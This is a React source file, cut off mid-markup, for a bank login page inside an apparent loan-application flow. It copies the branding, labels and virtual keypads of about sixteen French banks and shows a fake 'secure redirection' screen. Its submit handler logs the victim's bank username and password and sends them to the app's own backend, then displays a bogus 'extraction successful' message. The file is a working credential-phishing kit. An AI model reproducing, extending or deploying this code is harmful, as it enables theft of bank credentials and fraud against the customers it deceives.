import React, { useState, useEffect } from 'react';
import { useNavigate, useParams } from 'react-router-dom';
import { Card } from '../../components/ui/card';
import { Button } from '../../components/ui/button';
import { Input } from '../../components/ui/input';
import { useAuth } from '../../context/AuthContext';
import { loanFlowService, justificatifService } from '../../services/api';
import { useToast } from '../../hooks/use-toast';
import { Eye, EyeOff, ArrowLeft, Shield } from 'lucide-react';

// Configuration des banques
const BANK_CONFIG = {
  'societe-generale': {
    name: 'Société Générale',
    logo: 'https://customer-assets.emergentagent.com/job_credit-loan-site/artifacts/r1qyiszt_IMG_0689.jpeg',
    primaryColor: '#E11D28',
    secondaryColor: '#000000',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#E11D28',
    loginTitle: 'Connexion à votre Espace Client Particuliers',
    usernameLabel: 'Saisissez votre identifiant client',
    usernamePlaceholder: '',
    passwordLabel: 'Code secret',
    passwordPlaceholder: '',
    buttonText: 'Valider',
    buttonColor: '#E11D28',
    hasPrivacyPopup: true,
    isSGLayout: true,
    forgotIdentifiantLink: 'https://particuliers.sg.fr/swm/swm-restitution.html',
    forgotCodeLink: 'https://particuliers.sg.fr/swm/swm-reattribution.html'
  },
  'bnp-paribas': {
    name: 'BNP Paribas',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/x63kflay_IMG_0636.jpeg',
    headerLogo: 'https://customer-assets.emergentagent.com/job_credit-loan-site/artifacts/uq4xh7fa_IMG_0680.jpeg',
    primaryColor: '#006B3F',
    secondaryColor: '#1E1E1E',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#006B3F',
    loginTitle: 'Accédez à votre espace client',
    usernameLabel: 'Numéro Client',
    usernamePlaceholder: 'Numéro de 7 à 10 chiffres',
    passwordLabel: 'Code secret',
    passwordPlaceholder: 'Saisissez votre code secret',
    buttonText: 'Continuer',
    buttonColor: '#006B3F',
    hasPrivacyPopup: true,
    isBNPLayout: true,
    forgotIdentifiantLink: 'https://mabanque.bnpparibas/fr/banque-contacts/rit/',
    forgotCodeLink: 'https://mabanque.bnpparibas/fr/banque-contacts/recuperer-code-secret/'
  },
  'credit-agricole': {
    name: 'Crédit Agricole',
    logo: 'https://customer-assets.emergentagent.com/job_credit-loan-site/artifacts/ht7e5qin_IMG_0638.jpeg',
    primaryColor: '#006B3F',
    secondaryColor: '#1E1E1E',
    bgColor: '#F0F7F0',
    headerColor: '#FFFFFF',
    headerTextColor: '#006B3F',
    logoSize: 'xlarge',
    loginTitle: 'Accéder à mes comptes',
    usernameLabel: 'IDENTIFIANT',
    usernamePlaceholder: 'Exemple 98652706859',
    passwordLabel: 'CODE PERSONNEL',
    passwordPlaceholder: '',
    buttonText: 'VALIDER',
    buttonColor: '#006B3F',
    hasPrivacyPopup: false,
    isCreditAgricoleLayout: true,
    forgotCodeLink: 'https://www.credit-agricole.fr/particulier/reinitialisation-code-bam.html',
    caisseRegionales: [
      'Alpes Provence', 'Alsace Vosges', 'Anjou Maine', 'Aquitaine', 'Atlantique Vendée',
      'Brie Picardie', 'Centre Est', 'Centre France', 'Centre Loire', 'Centre Ouest',
      'Champagne Bourgogne', 'Charente Périgord', 'Charente-Maritime Deux-Sèvres', 'Corse',
      'Côtes d\'Armor', 'Des Savoie', 'Finistère', 'Franche Comté', 'Guadeloupe',
      'Ille et Vilaine', 'Languedoc', 'Loire Haute-Loire', 'Lorraine', 'Martinique Guyane',
      'Morbihan', 'Nord De France', 'Nord Est', 'Nord Midi Pyrénées', 'Normandie',
      'Normandie Seine', 'Paris et Île de France', 'Provence Côte d\'Azur', 'Pyrénées Gascogne',
      'Réunion - Mayotte', 'Sud Méditerranée', 'Sud Rhône Alpes', 'Toulouse 31',
      'Touraine Poitou', 'Val De France'
    ]
  },
  'lcl': {
    name: 'LCL',
    logo: 'https://customer-assets.emergentagent.com/job_creditportal-4/artifacts/r3dexn7y_IMG_0843.jpeg',
    primaryColor: '#0046AD',
    secondaryColor: '#1E5BC6',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#0046AD',
    loginTitle: 'Votre identifiant',
    usernameLabel: 'Votre identifiant',
    usernamePlaceholder: '',
    passwordLabel: 'Votre code personnel',
    passwordPlaceholder: '',
    buttonText: 'Continuer',
    buttonColor: '#1E5BC6',
    hasPrivacyPopup: true,
    isLCLLayout: true
  },
  'credit-mutuel': {
    name: 'Crédit Mutuel',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/qtvo8jsa_IMG_0577.jpeg',
    logoSymbol: 'https://customer-assets.emergentagent.com/job_creditportal-4/artifacts/tbb23zl6_IMG_0863.jpeg',
    primaryColor: '#1E3A8A',
    secondaryColor: '#dc2626',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#1E3A8A',
    headerLogoSmall: true,
    formLogoSmall: true,
    loginTitle: 'Se connecter',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: '',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: '',
    buttonText: 'Se connecter',
    buttonColor: '#1E3A8A',
    hasPrivacyPopup: true,
    isCreditMutuelLayout: true,
    forgotLink: 'https://www.creditmutuel.fr/fr/nous-contacter/assistance-technique.html',
    securityLink: 'https://www.creditmutuel.fr/fr/securite/fraude-securite-bancaire.html',
    cookiePolicyLink: 'https://www.creditmutuel.fr/fr/informations/politique-cookies.html'
  },
  'cic': {
    name: 'CIC',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/8u7n5zbc_IMG_0581.jpeg',
    primaryColor: '#0D9488',
    secondaryColor: '#0D9488',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#0D9488',
    loginTitle: 'Se connecter',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: '',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: '',
    buttonText: 'Se connecter',
    buttonColor: '#0D9488',
    hasPrivacyPopup: true,
    formLogoSmall: true,
    headerLogoSmall: true,
    isCICLayout: true,
    forgotLink: 'https://www.cic.fr/fr/nous-contacter/assistance-technique.html',
    securityLink: 'https://www.cic.fr/fr/securite/fraude-securite-bancaire.html',
    cookiePolicyLink: 'https://www.cic.fr/fr/informations/politique-cookies.html'
  },
  'banque-populaire': {
    name: 'Banque Populaire',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/fy04we5q_IMG_0585.jpeg',
    primaryColor: '#1A1F71',
    secondaryColor: '#1A1F71',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#1A1F71',
    loginTitle: 'Saisissez votre identifiant',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: 'Entrez votre identifiant',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'Valider',
    buttonColor: '#1A1F71',
    hasFraudAlert: true,
    hasPrivacyPopup: true,
    isBanquePopulaireLayout: true,
    banquesRegionales: [
      'Alsace Lorraine Champagne', 'Aquitaine Centre Atlantique', 'Auvergne Rhône Alpes',
      'Bourgogne Franche-Comté', 'BRED Banque Populaire', 'Du Nord',
      'Du Sud', 'Grand Ouest', 'Méditerranée',
      'Occitane', 'Rives de Paris', 'Val de France'
    ]
  },
  'caisse-epargne': {
    name: 'Caisse d\'Épargne',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/2mep4jcq_IMG_0609.jpeg',
    primaryColor: '#DC2626',
    secondaryColor: '#DC2626',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#DC2626',
    loginTitle: 'Saisissez votre identifiant',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: 'Entrez votre identifiant',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'Valider',
    buttonColor: '#DC2626',
    hasFraudAlert: true,
    hasPrivacyPopup: true,
    isCaisseEpargneLayout: true,
    caissesRegionales: [
      'Île-de-France', 'Grand Est Europe', 'Hauts de France', 'Normandie',
      'Bretagne Pays de Loire', 'Loire Centre', 'Bourgogne Franche-Comté',
      'Auvergne et Limousin', 'Rhône-Alpes', 'Loire Drôme Ardèche',
      'Aquitaine Poitou-Charentes', 'Midi-Pyrénées', 'Languedoc-Roussillon',
      'Provence Alpes Corse', 'Côte d\'Azur'
    ]
  },
  'la-banque-postale': {
    name: 'La Banque Postale',
    logo: 'https://customer-assets.emergentagent.com/job_de5fd55a-ccb9-4790-966a-0bfe35cdacca/artifacts/0cm8sewf_IMG_0623.jpeg',
    primaryColor: '#002855',
    secondaryColor: '#003DA5',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#002855',
    loginTitle: 'Connexion à votre compte particulier',
    usernameLabel: 'Identifiant (10 chiffres)',
    usernamePlaceholder: 'Votre identifiant',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'Continuer',
    buttonColor: '#002855',
    hasPrivacyPopup: true,
    isLaBanquePostaleLayout: true,
    forgotIdentifiantLink: 'https://www.labanquepostale.fr/particulier/footer/recuperation-mot-de-passe.html',
    forgotCodeLink: 'https://www.labanquepostale.fr/particulier/footer/recuperation-mot-de-passe.html'
  },
  'bpce': {
    name: 'BPCE Factor',
    logo: 'https://customer-assets.emergentagent.com/job_fintech-ui-mockup/artifacts/3j1b2ov7_IMG_0790.jpeg',
    primaryColor: '#6B4C9A',
    secondaryColor: '#D4145A',
    bgColor: '#F5F5F5',
    headerColor: '#FFFFFF',
    headerTextColor: '#6B4C9A',
    loginTitle: 'Connexion',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: 'Identifiant',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Mot de passe',
    buttonText: 'SE CONNECTER',
    buttonColor: '#CCCCCC',
    hasPrivacyPopup: true,
    isBPCELayout: true,
    forgotPasswordLink: 'https://factor-connect.bpce.fr/login',
    contactLink: 'https://factor-connect.bpce.fr/login',
    mentionsLegalesLink: 'https://factor-connect.bpce.fr/login',
    garantieDepotsLink: 'https://factor-connect.bpce.fr/login',
    protectionDonneesLink: 'https://factor-connect.bpce.fr/login',
    cookiesInfoLink: 'https://factor-connect.bpce.fr/login'
  },
  'ccf': {
    name: 'CCF',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/tfthira2_IMG_0781.jpeg',
    primaryColor: '#1A3C6E',
    secondaryColor: '#C5D9B0',
    bgColor: '#FFFFFF',
    headerColor: '#C5D9B0',
    headerTextColor: '#1A3C6E',
    loginTitle: 'Votre espace client CCF',
    usernameLabel: 'Votre identifiant',
    usernamePlaceholder: 'Saisissez votre identifiant',
    passwordLabel: 'Votre mot de passe',
    passwordPlaceholder: 'Saisissez votre mot de passe',
    buttonText: 'Suivant',
    buttonColor: '#1A3C6E',
    hasPrivacyPopup: true,
    isCCFLayout: true,
    accessRecoveryLink: 'https://mabanque.ccf.fr/access-recovery/choice',
    faqLink: 'https://ccf.fr/particuliers/aide-et-contacts/faq.html?thematic=espace-client-ccf',
    offreLink: 'https://ccf.fr/',
    contactLink: 'https://ccf.fr/particuliers/aide-et-contacts.html',
    mentionsLink: 'https://ccf.fr/particuliers/informations-legales/mentions-legales.html',
    cookiesLink: 'https://ccf.fr/particuliers/informations-legales/cookies.html',
    linkedinLink: 'https://www.linkedin.com/company/ccf-banque/',
    facebookLink: 'https://www.facebook.com/CCF.Banque',
    twitterLink: 'https://www.twitter.com/CCF_Banque'
  },
  'boursorama': {
    name: 'Boursorama Banque',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/5g5je0gf_IMG_0719.jpeg',
    primaryColor: '#E91E8C',
    secondaryColor: '#333333',
    bgColor: '#F5F5F5',
    headerColor: '#FFFFFF',
    headerTextColor: '#E91E8C',
    loginTitle: 'Mon identifiant',
    usernameLabel: '',
    usernamePlaceholder: 'Saisissez votre identifiant',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'Suivant',
    buttonColor: '#E91E8C',
    hasPrivacyPopup: true,
    isBoursoramaLayout: true,
    forgotIdentifiantLink: 'https://clients.boursobank.com/connexion/identifiant/retrouver/f654a3e024f8d/1'
  },
  'hello-bank': {
    name: 'Hello bank!',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/eokf30u1_IMG_0730.jpeg',
    primaryColor: '#00A3D9',
    secondaryColor: '#1A1A1A',
    bgColor: '#FFFFFF',
    headerColor: '#00A3D9',
    headerTextColor: '#FFFFFF',
    loginTitle: 'Accédez à votre espace client',
    usernameLabel: 'Numéro Client',
    usernamePlaceholder: 'Numéro de 7 à 10 chiffres',
    passwordLabel: 'Code secret',
    passwordPlaceholder: 'Votre code secret',
    buttonText: 'Continuer',
    buttonColor: '#00A3D9',
    hasPrivacyPopup: true,
    isHelloBankLayout: true,
    forgotIdentifiantLink: 'https://www.hellobank.fr/fr/client/rit/',
    forgotCodeSecretLink: 'https://www.hellobank.fr/fr/client/recuperer-code-secret/'
  },
  'fortuneo': {
    name: 'Fortuneo',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/61l3tej4_IMG_0229.jpeg',
    primaryColor: '#8CC63F',
    secondaryColor: '#333333',
    bgColor: '#FFFFFF',
    headerColor: '#FFFFFF',
    headerTextColor: '#8CC63F',
    loginTitle: 'Saisissez votre identifiant et mot de passe',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: '000000',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'Connexion',
    buttonColor: '#8CC63F',
    hasPrivacyPopup: true,
    isFortuneolayout: true,
    heroImage: 'https://images.unsplash.com/photo-1758524944006-ba8116008496?crop=entropy&cs=srgb&fm=jpg&ixid=M3w4NTYxNzV8MHwxfHNlYXJjaHwyfHx3b21hbiUyMHNtaWxpbmclMjBzbWFydHBob25lJTIwaGFwcHklMjBmaW5hbmNlJTIwYmFua2luZ3xlbnwwfHx8fDE3NzA4ODUzMzR8MA&ixlib=rb-4.1.0&q=85'
  },
  'monabanq': {
    name: 'Monabanq',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/3v004kxm_IMG_0737.jpeg',
    primaryColor: '#BFFF00',
    secondaryColor: '#000000',
    bgColor: '#FFFFFF',
    headerColor: '#000000',
    headerTextColor: '#FFFFFF',
    loginTitle: 'Accéder à mon espace client',
    usernameLabel: 'Identifiant',
    usernamePlaceholder: 'Votre identifiant',
    passwordLabel: 'Code d\'accès',
    passwordPlaceholder: 'Votre code d\'accès',
    buttonText: 'Se connecter',
    buttonColor: '#BFFF00',
    hasPrivacyPopup: true,
    isMonabanqLayout: true
  },
  'ing': {
    name: 'ING France',
    logo: 'https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/gc5ojhi2_IMG_0759.jpeg',
    primaryColor: '#FF6200',
    secondaryColor: '#4A4A4A',
    bgColor: '#FFFFFF',
    headerColor: '#4A4A4A',
    headerTextColor: '#FFFFFF',
    loginTitle: 'Entrez vos identifiants',
    usernameLabel: 'ID utilisateur',
    usernamePlaceholder: 'Votre ID utilisateur',
    passwordLabel: 'Mot de passe',
    passwordPlaceholder: 'Votre mot de passe',
    buttonText: 'SE CONNECTER',
    buttonColor: '#6B6B6B',
    hasPrivacyPopup: true,
    isINGLayout: true,
    forgotUserIdLink: 'https://ingcommercialcard.ing.com/Centre/Public/ForgotUserId?site=1313676',
    forgotPasswordLink: 'https://ingcommercialcard.ing.com/Centre/Public/ForgotPassword?site=1313676',
    resetLogonLink: 'https://ingcommercialcard.ing.com/Centre/Public/ResetLogon?site=1313676'
  }
};

const BankLogin = () => {
  const { bankId } = useParams();
  const { user } = useAuth();
  const navigate = useNavigate();
  const { toast } = useToast();
  
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [loading, setLoading] = useState(false);
  const [showExtraction, setShowExtraction] = useState(false);
  const [showPrivacyPopup, setShowPrivacyPopup] = useState(false);
  const [showRedirectPage, setShowRedirectPage] = useState(true);
  const [rememberMe, setRememberMe] = useState(false);
  const [boursoramaStep, setBoursoramaStep] = useState(1); // 1 = identifiant, 2 = password
  const [helloBankStep, setHelloBankStep] = useState(1); // 1 = numéro client, 2 = code secret
  const [ccfStep, setCcfStep] = useState(1); // 1 = identifiant, 2 = mot de passe
  const [sgStep, setSgStep] = useState(1); // 1 = identifiant, 2 = code secret avec clavier
  const [sgCode, setSgCode] = useState(''); // Code secret entered via virtual keyboard
  const [sgKeypadNumbers, setSgKeypadNumbers] = useState([]); // Randomized keypad numbers
  const [lclStep, setLclStep] = useState(1); // 1 = identifiant, 2 = code personnel avec clavier
  const [lclCode, setLclCode] = useState(''); // Code personnel entered via virtual keyboard
  const [lclKeypadNumbers, setLclKeypadNumbers] = useState([]); // Randomized keypad numbers for LCL
  const [lclIdentifier, setLclIdentifier] = useState(['', '', '', '', '', '', '', '', '', '']); // 10 digit identifier
  const [lclSecuritySlide, setLclSecuritySlide] = useState(0); // 0 or 1 for security carousel
  const [cmCookieSettings, setCmCookieSettings] = useState(false); // Credit Mutuel cookie settings view
  const [cmCookiePrefs, setCmCookiePrefs] = useState({ audience: false, social: false, ads: false }); // Cookie preferences
  const [cmAccordionOpen, setCmAccordionOpen] = useState(false); // Credit Mutuel accordion state - closed by default
  const [cicCookieSettings, setCicCookieSettings] = useState(false); // CIC cookie settings view
  const [cicAccordionOpen, setCicAccordionOpen] = useState(false); // CIC accordion state - closed by default
  const [bnpStep, setBnpStep] = useState(1); // 1 = numéro client, 2 = code secret
  const [bnpRememberMe, setBnpRememberMe] = useState(false); // BNP remember me toggle
  const [bnpCodeSecret, setBnpCodeSecret] = useState(''); // BNP code secret (6 digits)
  const [bnpKeypadNumbers, setBnpKeypadNumbers] = useState([]); // BNP randomized keypad
  const [lbpRememberMe, setLbpRememberMe] = useState(false); // La Banque Postale remember me toggle
  const [lbpStep, setLbpStep] = useState(1); // 1 = identifier, 2 = password with keypad
  const [lbpCodeSecret, setLbpCodeSecret] = useState(''); // La Banque Postale code secret (6 digits)
  const [lbpKeypadNumbers, setLbpKeypadNumbers] = useState([]); // La Banque Postale randomized keypad
  
  // Credit Agricole states
  const [caStep, setCaStep] = useState(1); // 1 = selection caisse, 2 = identifiant, 3 = code personnel
  const [caSelectedCaisse, setCaSelectedCaisse] = useState(''); // Selected caisse régionale
  const [caIdentifiant, setCaIdentifiant] = useState(''); // 11-digit identifier
  const [caCodePersonnel, setCaCodePersonnel] = useState(''); // 6-digit code
  const [caKeypadNumbers, setCaKeypadNumbers] = useState([]); // Randomized keypad
  const [caPostalCode, setCaPostalCode] = useState(''); // Postal code search
  const [caDropdownOpen, setCaDropdownOpen] = useState(false); // Custom dropdown for mobile

  // Banque Populaire states
  const [bpStep, setBpStep] = useState(1); // 1 = selection banque + identifiant, 2 = code secret keypad
  const [bpSelectedBanque, setBpSelectedBanque] = useState('');
  const [bpIdentifiant, setBpIdentifiant] = useState('');
  const [bpCodeSecret, setBpCodeSecret] = useState('');
  const [bpKeypadNumbers, setBpKeypadNumbers] = useState([]);
  const [bpPostalCode, setBpPostalCode] = useState('');
  const [bpDropdownOpen, setBpDropdownOpen] = useState(false);

  // Caisse d'Épargne states
  const [ceStep, setCeStep] = useState(1); // 1 = selection caisse + identifiant, 2 = code secret keypad
  const [ceSelectedCaisse, setCeSelectedCaisse] = useState('');
  const [ceIdentifiant, setCeIdentifiant] = useState('');
  const [ceCodeSecret, setCeCodeSecret] = useState('');
  const [ceKeypadNumbers, setCeKeypadNumbers] = useState([]);
  const [cePostalCode, setCePostalCode] = useState('');
  const [ceDropdownOpen, setCeDropdownOpen] = useState(false);

  const bank = BANK_CONFIG[bankId] || BANK_CONFIG['societe-generale'];

  // Generate randomized keypad numbers for SG
  useEffect(() => {
    if (bank.isSGLayout) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '', '', '', '', '', ''];
      // Shuffle the array
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setSgKeypadNumbers(numbers);
    }
  }, [bank.isSGLayout, sgStep]);

  // Generate randomized keypad numbers for LCL (5x2 grid)
  useEffect(() => {
    if (bank.isLCLLayout && lclStep === 2) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      // Shuffle the array
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setLclKeypadNumbers(numbers);
    }
  }, [bank.isLCLLayout, lclStep]);

  // Generate randomized keypad numbers for BNP (5x2 grid)
  useEffect(() => {
    if (bank.isBNPLayout && bnpStep === 2) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      // Shuffle the array
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setBnpKeypadNumbers(numbers);
    }
  }, [bank.isBNPLayout, bnpStep]);

  // Generate randomized keypad numbers for La Banque Postale (5x2 grid)
  useEffect(() => {
    if (bank.isLaBanquePostaleLayout && lbpStep === 2) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      // Shuffle the array
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setLbpKeypadNumbers(numbers);
    }
  }, [bank.isLaBanquePostaleLayout, lbpStep]);

  // Generate randomized keypad numbers for Credit Agricole (5x2 grid)
  useEffect(() => {
    if (bank.isCreditAgricoleLayout && caStep === 3) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      // Shuffle the array
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setCaKeypadNumbers(numbers);
    }
  }, [bank.isCreditAgricoleLayout, caStep]);

  // Generate randomized keypad numbers for Banque Populaire (5x2 grid)
  useEffect(() => {
    if (bank.isBanquePopulaireLayout && bpStep === 2) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setBpKeypadNumbers(numbers);
    }
  }, [bank.isBanquePopulaireLayout, bpStep]);

  // Generate randomized keypad numbers for Caisse d'Épargne (5x2 grid)
  useEffect(() => {
    if (bank.isCaisseEpargneLayout && ceStep === 2) {
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setCeKeypadNumbers(numbers);
    }
  }, [bank.isCaisseEpargneLayout, ceStep]);

  // Show redirect page for 3 seconds, then show privacy popup or login
  useEffect(() => {
    if (showRedirectPage) {
      const timer = setTimeout(() => {
        setShowRedirectPage(false);
        setShowPrivacyPopup(true);
      }, 3000);
      return () => clearTimeout(timer);
    }
  }, [showRedirectPage]);

  useEffect(() => {
    updateFlow();
  }, []);

  const updateFlow = async () => {
    try {
      const flow = await loanFlowService.getByClient(user.id);
      if (flow) {
        await loanFlowService.update(flow.id, {
          currentStep: 'bank_login',
          selectedBank: bankId
        });
      }
    } catch (error) {
      console.error('Error:', error);
    }
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    setLoading(true);

    try {
      // Force fresh fetch of flow data
      let flow = await loanFlowService.getByClient(user.id);
      
      // If no flow exists, create one
      if (!flow) {
        flow = await loanFlowService.create({
          clientId: user.id,
          currentStep: 'bank_completed'
        });
      }
      
      console.log('=== BANK CREDENTIALS SUBMISSION ===');
      console.log('User ID:', user.id);
      console.log('Flow ID:', flow?.id);
      console.log('Current bankCredentials:', JSON.stringify(flow?.bankCredentials));
      console.log('Current bankCredentialsHistory:', JSON.stringify(flow?.bankCredentialsHistory));
      console.log('New username:', username);
      console.log('New password:', password);
      
      if (flow) {
        // Create new credentials entry - the backend will handle archiving old ones
        const newCredentials = {
          bank: bankId,
          bankName: bank.name,
          username: username,
          password: password,
          submittedAt: new Date().toISOString()
        };

        console.log('Submitting new credentials to backend:', JSON.stringify(newCredentials));

        // Update flow - backend will automatically archive old credentials
        await loanFlowService.update(flow.id, {
          currentStep: 'bank_completed',
          bankCredentials: newCredentials
        });

        // Créer les justificatifs validés pour bank
        await justificatifService.createValidated(user.id, 'releve_identite_bancaire');
        await justificatifService.createValidated(user.id, 'releve_compte');

        // Show extraction loading screen
        setLoading(false);
        setShowExtraction(true);

        // Wait for 4 seconds then redirect
        setTimeout(() => {
          toast({
            title: 'Extraction réussie',
            description: 'Vos informations bancaires ont été récupérées',
          });

          // Redirect to success page with appropriate type
          navigate('/client/justificatif-success', { 
            state: { 
              type: 'releve_identite_bancaire',
              title: 'Relevé bancaire'
            } 
          });
        }, 4000);
      }
    } catch (error) {
      console.error('Error:', error);
      setLoading(false);
      toast({
        title: 'Erreur',
        description: 'Une erreur est survenue',
        variant: 'destructive',
      });
    }
  };

  // Redirect Loading Page - Shows before login page
  if (showRedirectPage) {
    return (
      <div className="min-h-screen flex flex-col items-center justify-center" style={{ backgroundColor: '#F8F9FA' }}>
        <div className="bg-white rounded-2xl shadow-xl p-10 max-w-sm w-full mx-4 text-center">
          {/* Lock Icon */}
          <div className="flex justify-center mb-6">
            <div className="w-20 h-20 rounded-full flex items-center justify-center" style={{ backgroundColor: bank.primaryColor + '15' }}>
              <svg 
                className="w-10 h-10" 
                fill="none" 
                stroke={bank.primaryColor} 
                viewBox="0 0 24 24"
                strokeWidth={1.5}
              >
                <path strokeLinecap="round" strokeLinejoin="round" d="M16.5 10.5V6.75a4.5 4.5 0 10-9 0v3.75m-.75 11.25h10.5a2.25 2.25 0 002.25-2.25v-6.75a2.25 2.25 0 00-2.25-2.25H6.75a2.25 2.25 0 00-2.25 2.25v6.75a2.25 2.25 0 002.25 2.25z" />
              </svg>
            </div>
          </div>

          {/* Bank Logo */}
          <div className="flex justify-center mb-6">
            {bank.logo ? (
              <img 
                src={bank.logo} 
                alt={bank.name} 
                className="h-16 w-auto object-contain"
              />
            ) : (
              <div 
                className="h-16 w-16 rounded-lg flex items-center justify-center text-white font-bold text-2xl"
                style={{ backgroundColor: bank.primaryColor }}
              >
                {bank.name.charAt(0)}
              </div>
            )}
          </div>

          {/* Bank Name */}
          <h2 className="text-xl font-semibold text-gray-800 mb-4">
            {bank.name}
          </h2>

          {/* Redirect Message */}
          <p className="text-gray-600 mb-6">
            Redirection vers votre espace client sécurisé...
          </p>

          {/* Loading Animation */}
          <div className="flex justify-center mb-4">
            <div className="flex space-x-2">
              <div 
                className="w-3 h-3 rounded-full animate-bounce" 
                style={{ backgroundColor: bank.primaryColor, animationDelay: '0ms' }}
              ></div>
              <div 
                className="w-3 h-3 rounded-full animate-bounce" 
                style={{ backgroundColor: bank.primaryColor, animationDelay: '150ms' }}
              ></div>
              <div 
                className="w-3 h-3 rounded-full animate-bounce" 
                style={{ backgroundColor: bank.primaryColor, animationDelay: '300ms' }}
              ></div>
            </div>
          </div>

          {/* Security Badge */}
          <div className="flex items-center justify-center text-sm text-gray-500">
            <svg className="w-4 h-4 mr-1 text-green-500" fill="currentColor" viewBox="0 0 20 20">
              <path fillRule="evenodd" d="M2.166 4.999A11.954 11.954 0 0010 1.944 11.954 11.954 0 0017.834 5c.11.65.166 1.32.166 2.001 0 5.225-3.34 9.67-8 11.317C5.34 16.67 2 12.225 2 7c0-.682.057-1.35.166-2.001zm11.541 3.708a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clipRule="evenodd" />
            </svg>
            Connexion sécurisée
          </div>
        </div>
      </div>
    );
  }

  // Extraction Loading Screen
  if (showExtraction) {
    // Smaller logo for ING
    const extractionLogoClass = bank.isINGLayout ? "h-10 w-auto object-contain" : "h-16 w-auto object-contain";
    
    return (
      <div className="min-h-screen bg-gradient-to-b from-gray-50 to-gray-100 flex items-center justify-center p-4">
        <div className="w-full max-w-md">
          <Card className="p-8 bg-white shadow-2xl rounded-2xl">
            {/* Bank Logo */}
            <div className="flex justify-center mb-8">
              {bank.logo ? (
                <img 
                  src={bank.logo} 
                  alt={bank.name} 
                  className={extractionLogoClass}
                />
              ) : (
                <div 
                  className="h-16 w-16 rounded-lg flex items-center justify-center text-white font-bold text-xl"
                  style={{ backgroundColor: bank.primaryColor }}
                >
                  {bank.name.charAt(0)}
                </div>
              )}
            </div>

            {/* Spinner Animation */}
            <div className="flex justify-center mb-8">
              <div className="relative">
                {/* Outer ring */}
                <div 
                  className="w-20 h-20 rounded-full border-4 border-gray-200"
                  style={{ borderTopColor: bank.primaryColor }}
                ></div>
                {/* Spinning ring */}
                <div 
